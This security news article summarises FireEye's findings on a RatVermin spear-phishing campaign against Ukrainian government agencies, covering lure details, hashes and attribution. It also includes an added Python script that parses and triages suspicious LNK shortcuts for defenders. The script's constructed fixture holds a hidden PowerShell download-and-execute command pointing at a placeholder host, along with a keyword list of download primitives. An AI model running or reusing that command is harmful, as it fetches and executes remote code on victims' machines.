RatVermin Spyware Campaign: Ukraine Gov Agencies Targeted
A phishing campaign in which Ukraine government agencies are targeted with the RatVermin malware has been uncovered.
Security researchers at FireEye Threat Intelligence have uncovered an ongoing spear phishing campaign targeting the Ukrainian government and military with emails that distribute the RatVermin malware, a remote access tool that the attackers use for information gathering.
FireEye’s Threat Intelligence research group researchers John Hultquist, Ben Read, Oleg Bondarenko and Chi-en Shen, in an analytical blog post dated April 16, 2019, say, “In early 2019, FireEye Threat Intelligence identified a spear phishing email targeting government entities in Ukraine. The spear phishing email included a malicious LNK file with PowerShell script to download the second-stage payload from the command and control (C&C) server. The email was received by military departments in Ukraine and included lure content related to the sale of demining machines.”
Researchers suspect that actors associated with the so-called Luhansk People’s Republic, a proto-state in eastern Ukraine, could be involved in the attack. The FireEye blog post observes, “This latest activity is a continuation of spear phishing that targeted the Ukrainian Government as early as 2014. The email is linked to activity that previously targeted the Ukrainian Government with RATVERMIN. Infrastructure analysis indicates the actors behind the intrusion activity may be associated with the so-called Luhansk People’s Republic (LPR).”
The FireEye researchers spotted a sample email from the campaign, sent on January 22, 2019 with the subject “SPEC-20T-MK2-000-ISS-4.10-09-2018-STANDARD”. The sender’s name, obviously fake, was given as Armtrac, a defense manufacturer in the U.K. The researchers explain in their blog post, “The email included an attachment with the filename “Armtrac-Commercial.7z” (MD5: 982565e80981ce13c48e0147fb271fe5). This 7z package contained “Armtrac-Commercial.zip” (MD5: e92d01d9b1a783a23477e182914b2454) with two benign Armtrac documents and one malicious LNK file with a substituted icon.” The substituted Microsoft Word icon was clearly intended to make the shortcut pass as a document and trick the victim into opening it.
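The lure described above relies on two properties of a Windows shortcut (.lnk) file: a command line that starts PowerShell to fetch a second stage, and an icon borrowed from Word so the shortcut looks like a document. Both are stored as plain fields in the Shell Link binary format (MS-SHLLINK), so a triage script can read them without executing anything. The following Python is an added example for defenders, not code from FireEye or from the article; the .lnk bytes it parses are a constructed fixture built in the script (not the campaign’s sample), and the scoring heuristics are the example’s own, not FireEye’s detection logic.

```python
import struct

# LinkCLSID that every Shell Link header must carry (MS-SHLLINK 2.1).
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

# LinkFlags bits (MS-SHLLINK 2.1.1) that decide which optional structures follow the header.
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80
SW_SHOWMINNOACTIVE = 7  # ShowCommand value that keeps the launched window out of the foreground


def _string_data(s: str) -> bytes:
    """StringData item: uint16 character count followed by UTF-16LE characters."""
    return struct.pack("<H", len(s)) + s.encode("utf-16-le")


def build_constructed_lnk(relative_path: str, arguments: str, icon_location: str,
                          show_command: int = 1) -> bytes:
    """Build a minimal, structurally valid .lnk (constructed test fixture, not a real sample)."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | HAS_ICON_LOCATION | IS_UNICODE
    # ShellLinkHeader: size, CLSID, flags, attrs, 3 FILETIMEs, file size, icon index,
    # show command, hot key, reserved1/2/3 (76 bytes in total).
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags, 0,
                         0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)
    body = _string_data(relative_path) + _string_data(arguments) + _string_data(icon_location)
    return header + body + b"\x00\x00\x00\x00"  # TerminalBlock ends the ExtraData section


def parse_lnk(data: bytes) -> dict:
    """Extract the command line and icon fields a triage analyst cares about."""
    header_size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if header_size != 0x4C or clsid != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    show_command = struct.unpack_from("<I", data, 60)[0]
    pos = header_size
    if flags & HAS_LINK_TARGET_ID_LIST:      # skip IDList: uint16 size + items
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                # skip LinkInfo: uint32 size includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    unicode = bool(flags & IS_UNICODE)
    fields = {"show_command": show_command}
    for flag, name in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                       (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                       (HAS_ICON_LOCATION, "icon_location")):
        if flags & flag:
            count = struct.unpack_from("<H", data, pos)[0]
            pos += 2
            nbytes = count * 2 if unicode else count
            fields[name] = data[pos:pos + nbytes].decode("utf-16-le" if unicode else "cp1252")
            pos += nbytes
    return fields


def triage_lnk(fields: dict) -> list:
    """Heuristics (this example's own) for a shortcut posing as a document."""
    findings = []
    cmd = " ".join(fields.get(k, "") for k in ("relative_path", "arguments")).lower()
    icon = fields.get("icon_location", "").lower()
    if "powershell" in cmd:
        findings.append("launches PowerShell")
    if any(k in cmd for k in ("downloadstring", "downloadfile", "invoke-webrequest", "http://", "https://")):
        findings.append("command line contains a download primitive or URL")
    if "-w hidden" in cmd or "windowstyle hidden" in cmd:
        findings.append("requests a hidden PowerShell window")
    if "powershell" in cmd and "winword" in icon:
        findings.append("icon borrowed from Word while the target is PowerShell (document lookalike)")
    if fields.get("show_command") == SW_SHOWMINNOACTIVE:
        findings.append("window starts minimized and never takes focus")
    return findings


# Constructed fixtures: one shortcut shaped like the lure in the article, one ordinary document link.
MALICIOUS_LNK = build_constructed_lnk(
    r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "-NoProfile -WindowStyle Hidden -Command \"IEX (New-Object Net.WebClient)"
    ".DownloadString('http://c2.invalid/stage2')\"",   # c2.invalid is a placeholder host
    r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
    show_command=SW_SHOWMINNOACTIVE)
BENIGN_LNK = build_constructed_lnk(r"..\report.docx", "", "")

if __name__ == "__main__":
    for label, blob in (("constructed lure", MALICIOUS_LNK), ("benign", BENIGN_LNK)):
        print(label, "->", triage_lnk(parse_lnk(blob)) or ["nothing suspicious"])
```

The parser deliberately skips the LinkTargetIDList and LinkInfo structures rather than decoding them; on real samples the absolute target usually lives in the IDList, so a production tool (or LNK parsers such as those in forensic suites) would decode it as well. Running the script on a mail gateway’s quarantined archive contents is the natural place for it: an archive whose only executable content is a shortcut that starts PowerShell and wears a Word icon is exactly the shape this campaign used.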
The group behind the campaign may have been active since at least 2014, according to the FireEye team, which first reported on its activity in early 2018. At that time the group infected victims with standalone EXE or self-extracting RAR (SFX) files; it then gradually grew in sophistication, leveraging both custom and open-source malware, and its recent move to malicious LNK files continues that trend. The group, which uses the open-source QUASARRAT alongside the RATVERMIN malware, seems to be focused on Ukrainian entities, as suggested by the filenames it uses and by malware distribution data.
The blog post by the FireEye researchers points out, “This actor has likely been active since at least 2014, and its continuous targeting of the Ukrainian Government suggests a cyber espionage motivation. This is supported by the ties to the so-called LPR’s security service. While more evidence is needed for definitive attribution, this activity showcases the accessibility of competent cyber espionage capabilities, even to sub-state actors. While this specific group is primarily a threat to Ukraine, nascent threats to Ukraine have previously become international concerns and bear monitoring.”
The command and control server was unreachable during the FireEye analysis. The researchers found, however, that the network infrastructure was linked to domains previously associated with the RatVermin remote access tool, which can capture screenshots and audio, among other malicious capabilities.
Lindsey O’Donnell of Threatpost writes, “The researchers made a link to LPR because the domain used by the command-and-control (C2) server in the campaign was registered under the same email ([email protected][.]ru) as several other domains – including one for the official website of the Ministry of State Security of the Luhansk People’s Republic.”
The Threatpost report adds, “It’s not the first time the Ukraine government has been targeted by a cyberattack – in April 2018, for instance, the Ukrainian Energy Ministry was hit by a ransomware attack, in what researchers believed was the work of amateurs rather than cyber-espionage efforts. Other efforts however have shown more skill.”